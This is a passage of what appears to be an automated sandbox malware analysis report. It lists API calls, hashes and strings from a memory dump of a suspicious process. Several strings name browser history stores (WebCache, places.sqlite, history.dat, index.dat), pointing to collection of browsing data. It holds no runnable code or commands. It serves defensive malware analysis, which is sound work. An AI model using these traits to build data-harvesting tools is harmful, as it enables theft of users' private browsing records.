                                                                                                                                                                                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmpqsort
                                                                                                                                                                                                                          • String ID: /nosort$/sort
                                                                                                                                                                                                                          • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                          • API String ID: 3354267031-2114579845
                                                                                                                                                                                                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                          • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                                                                          • String ID: }A
                                                                                                                                                                                                                          • API String ID: 1821831730-2138825249
                                                                                                                                                                                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@DeleteObject
                                                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                                                          • API String ID: 1103273653-628097481
                                                                                                                                                                                                                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                                          • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                          • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$memcmp
                                                                                                                                                                                                                          • String ID: $$8
                                                                                                                                                                                                                          • API String ID: 2808797137-435121686
                                                                                                                                                                                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • too many columns on %s, xrefs: 00430763
                                                                                                                                                                                                                          • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                                                                                                          • API String ID: 0-1445880494
                                                                                                                                                                                                                          • Opcode ID: 2926fa06368f5232b18cfbe9a067055150ad8579ce0375914d7c8593e780dd9c
                                                                                                                                                                                                                          • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2926fa06368f5232b18cfbe9a067055150ad8579ce0375914d7c8593e780dd9c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                            • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                            • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1042154641-0
                                                                                                                                                                                                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                            • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2947809556-0
                                                                                                                                                                                                                          • Opcode ID: 9c8f7abab99d1da351ac3b6f8ce72ab423c1774e4fe74519c125927a022e4df4
                                                                                                                                                                                                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c8f7abab99d1da351ac3b6f8ce72ab423c1774e4fe74519c125927a022e4df4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                                                                                                                                                          • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                          • API String ID: 3093078384-467022611
                                                                                                                                                                                                                          • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                                                                                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 839530781-0
                                                                                                                                                                                                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                          • String ID: *.*$index.dat
                                                                                                                                                                                                                          • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@mallocmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3831604043-0
                                                                                                                                                                                                                          • Opcode ID: 2a092ad8f2336585ed98353820426f0e3c8ffb733fb9aa85e0df6135544c2253
                                                                                                                                                                                                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a092ad8f2336585ed98353820426f0e3c8ffb733fb9aa85e0df6135544c2253
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1156039329-0
                                                                                                                                                                                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
